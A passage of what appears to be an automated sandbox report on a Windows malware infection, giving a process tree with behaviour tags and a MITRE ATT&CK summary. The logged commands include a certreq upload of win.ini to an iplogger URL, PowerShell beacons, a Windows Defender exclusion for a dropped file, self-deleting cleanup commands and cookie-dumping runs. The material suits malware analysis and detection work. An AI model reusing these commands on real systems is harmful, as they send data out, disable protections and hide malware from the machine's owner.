C:\Users\Admin\AppData\Local\Temp\t1emmpifrql\gnlptcgkti5.exe"C:\Users\Admin\AppData\Local\Temp\t1emmpifrql\gnlptcgkti5.exe" /ustwo INSTALL8⤵PID:6124
-
-
C:\Users\Admin\AppData\Local\Temp\aff4jmhe3hq\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\aff4jmhe3hq\chashepro3.exe" /VERYSILENT8⤵PID:10892
-
C:\Users\Admin\AppData\Local\Temp\is-C478O.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-C478O.tmp\chashepro3.tmp" /SL5="$D050E,1478410,58368,C:\Users\Admin\AppData\Local\Temp\aff4jmhe3hq\chashepro3.exe" /VERYSILENT9⤵PID:10732
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4632 -
C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4460 -
C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"C:\Users\Admin\AppData\Roaming\E93D.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1812
-
-
-
C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3536 -
C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"{path}"6⤵
- Executes dropped EXE
PID:4268
-
-
C:\Users\Admin\AppData\Roaming\EA18.tmp.exe"{path}"6⤵
- Executes dropped EXE
PID:5264
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:968
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:1004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:2712 -
C:\ProgramData\6756324.74"C:\ProgramData\6756324.74"5⤵
- Executes dropped EXE
PID:5464
-
-
C:\ProgramData\6943189.76"C:\ProgramData\6943189.76"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5492 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
PID:4964
-
-
-
C:\ProgramData\3402114.37"C:\ProgramData\3402114.37"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5512 -
C:\ProgramData\3402114.37"{path}"6⤵PID:6428
-
-
-
C:\ProgramData\5628588.61"C:\ProgramData\5628588.61"5⤵
- Executes dropped EXE
PID:5548
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5624 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:4896
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:4796
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 50F9AA333D3AF30AE9EE2DD59695F489 C2⤵
- Loads dropped DLL
PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\is-4TVO7.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-4TVO7.tmp\chashepro3.tmp" /SL5="$102AE,1478410,58368,C:\Users\Admin\AppData\Local\Temp\mno5qur0nrc\chashepro3.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5096 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"2⤵
- Checks computer location settings
PID:572
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4208
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1504 -
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵PID:6488
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵PID:4004
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵PID:4344
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"2⤵
- Checks computer location settings
PID:4596
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:3300
-
-
C:\Program Files (x86)\JCleaner\mex.exe"C:\Program Files (x86)\JCleaner\mex.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4688 -
C:\Program Files (x86)\JCleaner\mex.exe"{path}"3⤵PID:6376
-
-
C:\Program Files (x86)\JCleaner\mex.exe"{path}"3⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6392 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"4⤵PID:6684
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:6216
-
-
-
-
-
C:\Program Files (x86)\JCleaner\Brava.exe"C:\Program Files (x86)\JCleaner\Brava.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3824
-
-
C:\Users\Admin\AppData\Local\Temp\is-11RFD.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-11RFD.tmp\vpn.tmp" /SL5="$102B4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\abz1zpnfd2k\vpn.exe" /silent /subid=4821⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4488 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:3892
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5732
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:6688
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:6880
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2600
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:2268
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5508
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6020
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6656
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6800
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6960 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{675ff6a0-eda1-7447-bc45-842e34f80677}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7004
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7080
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7124
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7116
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:6220
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:5340
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:6860
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4200
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5576
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3060
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8064
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0xd4,0x248,0x7ff714827740,0x7ff714827750,0x7ff7148277601⤵PID:2712
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2001⤵PID:6908
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6656
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7692
-
C:\Users\Admin\AppData\Roaming\jcirtifC:\Users\Admin\AppData\Roaming\jcirtif1⤵PID:7544
-
C:\Users\Admin\AppData\Roaming\jcirtifC:\Users\Admin\AppData\Roaming\jcirtif2⤵PID:6968
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9036
-
C:\Users\Admin\AppData\Local\Temp\3C30.tmp.exeC:\Users\Admin\AppData\Local\Temp\3C30.tmp.exe1⤵PID:10552
-
C:\Users\Admin\AppData\Local\Temp\794066702.exe"C:\Users\Admin\AppData\Local\Temp\794066702.exe"2⤵PID:5348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 2683⤵
- Program crash
PID:6292
-
-
-
C:\Users\Admin\AppData\Local\Temp\1712476341.exe"C:\Users\Admin\AppData\Local\Temp\1712476341.exe"2⤵PID:5428
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1712476341.exe" -Force3⤵PID:8396
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 13⤵PID:8476
-
C:\Windows\SysWOW64\timeout.exetimeout 14⤵
- Delays execution with timeout.exe
PID:8200
-
-
-
C:\Users\Admin\AppData\Local\Temp\1712476341.exe"C:\Users\Admin\AppData\Local\Temp\1712476341.exe"3⤵PID:7132
-
-
-
C:\Users\Admin\AppData\Local\Temp\4327.tmp.exeC:\Users\Admin\AppData\Local\Temp\4327.tmp.exe1⤵PID:10792
-
C:\Users\Admin\AppData\Local\Temp\4327.tmp.exe"C:\Users\Admin\AppData\Local\Temp\4327.tmp.exe"2⤵PID:6556
-
-
C:\Users\Admin\AppData\Local\Temp\4A7B.tmp.exeC:\Users\Admin\AppData\Local\Temp\4A7B.tmp.exe1⤵PID:10944
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:888
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1680
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8332
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1584
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7612
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:10836
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:10192
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5212
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9164
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7428
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:668
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10224
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7832
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:14068
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e201⤵PID:13744
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e201⤵PID:7164
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:3660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:1680
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:14788
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:14988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:12988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:15196
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
4Web Service
1